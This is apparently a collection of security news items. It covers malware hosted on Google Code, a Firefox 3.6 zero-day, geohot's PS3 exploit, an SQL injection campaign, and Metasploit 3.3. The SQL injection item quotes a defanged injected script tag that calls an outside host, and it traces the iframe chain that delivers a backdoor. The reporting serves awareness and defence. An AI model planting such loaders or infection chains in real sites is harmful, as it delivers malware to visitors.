Last year, there was discussion of Google Code, a site which allows developers to host their projects, being used to spread malware. zScaler research found yet another case where Google Code is being used to spread malware. According to Google Code site,

“Project Hosting on Google Code provides a free collaborative development environment for open source projects. Each project comes with its own member controls, Subversion/Mercurial repository, issue tracker, wiki pages, and downloads section. Our project hosting service is simple, fast, reliable, and scalable, so that you can focus on your own open source development”.

The malicious project in question has about 50+ executable stored in the download section of the project.

Most of the files are executable files along with zipped “.rar” files. The time stamps show that the files have been uploaded over the course of the last month. This suggests that an attacker is actively using this free service to spread malware. Virustotal results for the first file, show that only 8 antivirus vendors out of 43 flagged the file as malicious. The detection ratio for second file is slightly better than that of the first file.

Analysis of all files shows that they are all malicious threats including Trojans horses, backdoors, password stealing Keyloggers for online games such as “World of Warcraft” etc. Analysis of the file resources from ThreatExpert report indicates the possible country of origin is China. Interestingly, Google Code FAQ page says they will take down the whole project if they find malware being hosted on the project.

UPDATE: 2 September 2010
Google has immediately taken down the project and URL to that project is no longer accessible.
Source: zScaler Research

Russian security firm Intevydis has made a Windows exploit for a previously unknown security hole in Firefox 3.6 available to its customers. The exploit allows attackers to remotely gain control of a PC. Intevydis develops the commercial VulnDisco add-on for the also commercial Canvas exploit toolkit by vendor Immunity. On the Immunity forum, developer Evgeny Legerov praises his exploit for Windows XP (SP3) and Vista as being quite reliable. The developer says It was an interesting challenge to find the flaw – a buffer overflow – and to exploit it.

While the post dates back to the beginning of February, the hole is likely to remain open since no updates have been released for Firefox 3.6 so far. Secunia rates the problem as critical, but hasn’t provided any further information in its advisories and the Mozilla Foundation has become aware of the problem, but has yet to release an official statement. Whether the exploit has already been widely circulated or used on a large scale remains unknown.

However, according to the analysis on the Extraexploit blog, a significant increase in the number of Firefox 3.6 crashes was noted on the 12th and 13th of February. It is unclear whether the crashes were connected to the exploit being tested. The pages causing the highest number of crashes are listed in Mozilla’s crash reports.

In passing, Legerov also mentions zero day exploits for Lotus Notes 8.5/8.5fp1 and for RealPlayer 11. The exploit for RealPlayer is the modernised version of an exploit that appeared two years ago for a hole that RealPlayer closed only recently.

Geohot finally released his exploit so the world could see for itself exactly what the hack does and doesn’t accomplish.

According to the instructions, it involves compiling and running the kernel module and then pulsing a memory bus on the PS3′s motherboard.

“Try this multiple times,” his instructions state. “I rigged an FPGA button to send the pulse. Sometimes it kernel panics, sometimes it lv1 panics, but sometimes you get the exploit!! If the module exits, you are now exploited.”

While the idea is sound, this hack is clearly not for the faint of heart.

From there, PS3 users get full memory access, including ring 0 access from OtherOS, geohot, whose real name is George Hotz, said here. He’s now turning follow-on work to the PS3 community, directing members to report their findings to the psDevWiki.

His instructions conclude: “The PS3 is hacked, its your job to figure out something useful to do with it.”

Source: The Register

A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009.

Infection sequence:
Injected iframe – <script src=hxxp://318x.com>
Executes a script that creates a new iframe to 318x.com/a.htm. That iframe (a.htm) does 2 things:

1. Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html
2. Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).

The aa1100.2288.org/htmlasp/dasp/alt.html frame:

* Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html
* Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but different number)
* If <noscript> it has an href tag that points to www.linezing.com with an img src of img.tongji.linezing.com/1364067/tongji.gif

The share.html detects browser type and writes/loads multiple iframes pointing to obfuscated script files located in the same directory (all are javascript regardless of extension). The combined action results in checks for MDAC, OWC10, and various versions of Adobe Flash. Depending on the results, the malcode then delivers one of several possible exploits.

Observed Exploits Include:

• Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
• MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
• Microsoft Office Web Components vulnerabilities described in MS09-043
• Microsoft video ActiveX vulnerability described in MS09-032
• Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.

Malware Description:
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

Source: Net-Security

The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.

Version 3.3 is the latest stable release of the Metasploit Framework and the recommended starting point for new users. Using the online update system, this version can be synchronized with the development tree to obtain the latest exploits and payloads.

Metasploit now has 445 exploit modules and 216 auxiliary modules.

Download: Metasploit 3.3

More Info: Metasploit 3.3 Release Notes